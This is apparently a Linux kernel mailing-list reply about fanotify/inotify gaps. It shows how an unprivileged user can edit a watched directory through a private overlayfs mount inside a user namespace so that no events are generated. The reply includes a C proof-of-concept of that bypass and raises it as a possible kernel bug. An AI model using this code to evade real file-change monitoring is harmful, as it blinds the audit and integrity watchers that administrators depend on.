> > > OK, so this feature would effectively allow sb-wide watching of events that
> > > are generated from within the container (or its descendants). That sounds
> > > useful. Just one question: If there's some part of a filesystem, that is
> > > accessible by multiple containers (and thus multiple namespaces), or if
> > > there's some change done to the filesystem say by container management SW,
> > > then event for this change won't be visible inside the container (despite
> > > that the fs change itself will be visible).
> >
> > That is correct.
> > FYI, a privileged user can already mount an overlayfs in order to indirectly
> > open and write to a file.
> >
> > Because overlayfs opens the underlying file FMODE_NONOTIFY this will
> > hide OPEN/ACCESS/MODIFY/CLOSE events also for inode/sb marks.
> > Since 459c7c565ac3 ("ovl: unprivileged mounts"), so can unprivileged users.
> >
> > I wonder if that is a problem that we need to fix...
>
> I assume you are speaking of the filesystem that is absorbing the changes?
> AFAIU usually you are not supposed to access that filesystem alone but
> always access it only through overlayfs and in that case you won't see the
> problem?
>

Yes, I am talking about the "backend" store for overlayfs.
Normally, that would be a subtree where changes are not expected
except through overlayfs, and indeed it is documented that:
"If the underlying filesystem is changed, the behavior of the overlay
 is undefined, though it will not result in a crash or deadlock."
Not reporting events falls well under "undefined".

But that is not the problem.
The problem is that if user A is watching a directory D for changes, then
an adversary user B who has read/write access to D can:
- Create a userns in which user B's id is 0
- Mount a private overlayfs instance using D as upperdir
- Open a file in D indirectly via the private overlayfs and edit it

So circumventing event generation does not require any special
privileges. Unless I am missing something.

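For illustration only, the three steps above could look roughly like the
sketch below. It is untested against a live watcher and rests on several
assumptions: a kernel with 459c7c565ac3 and unprivileged user namespaces
enabled, a workdir that sits on the same filesystem as D but outside of it,
and lower/merged directories that user B created beforehand. All function
names and path parameters are hypothetical.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <unistd.h>

/* Write a short string to an existing file; returns 0 on success. */
int write_file(const char *path, const char *buf)
{
	ssize_t n;
	int fd = open(path, O_WRONLY);

	if (fd < 0)
		return -1;
	n = write(fd, buf, strlen(buf));
	close(fd);
	return n == (ssize_t)strlen(buf) ? 0 : -1;
}

/* Build the overlayfs mount options, with D passed in as upperdir. */
int ovl_opts(char *buf, size_t len, const char *lower,
	     const char *upper, const char *work)
{
	int n = snprintf(buf, len, "lowerdir=%s,upperdir=%s,workdir=%s",
			 lower, upper, work);

	return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Step 1: enter a new userns + mntns where the caller maps to id 0. */
int become_userns_root(void)
{
	char map[64];
	uid_t uid = getuid();	/* read ids before unshare() */
	gid_t gid = getgid();

	if (unshare(CLONE_NEWUSER | CLONE_NEWNS))
		return -1;
	snprintf(map, sizeof(map), "0 %u 1", (unsigned int)uid);
	if (write_file("/proc/self/uid_map", map))
		return -1;
	/* setgroups must be denied before an unprivileged gid_map write */
	if (write_file("/proc/self/setgroups", "deny"))
		return -1;
	snprintf(map, sizeof(map), "0 %u 1", (unsigned int)gid);
	return write_file("/proc/self/gid_map", map);
}

/*
 * Steps 2 and 3: mount a private overlay with D as upperdir, then append
 * to D/name through the overlay instead of touching D directly.
 */
int modify_via_overlay(const char *lower, const char *d, const char *work,
		       const char *merged, const char *name)
{
	char opts[4096], path[4096];
	int fd, n, ret = 0;

	if (ovl_opts(opts, sizeof(opts), lower, d, work))
		return -1;
	n = snprintf(path, sizeof(path), "%s/%s", merged, name);
	if (n < 0 || (size_t)n >= sizeof(path))
		return -1;
	if (become_userns_root())
		return -1;
	if (mount("overlay", merged, "overlay", 0, opts))
		return -1;
	fd = open(path, O_WRONLY | O_APPEND);
	if (fd < 0)
		return -1;
	if (write(fd, "x\n", 2) != 2)
		ret = -1;
	close(fd);
	return ret;
}
```

User B would call modify_via_overlay() from a small main() while user A
holds an inotify or fanotify mark on D. If the reasoning above is right, A's
watcher gets no OPEN/MODIFY/CLOSE events for that write, although the change
itself is visible in D.
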
Thanks,
Amir.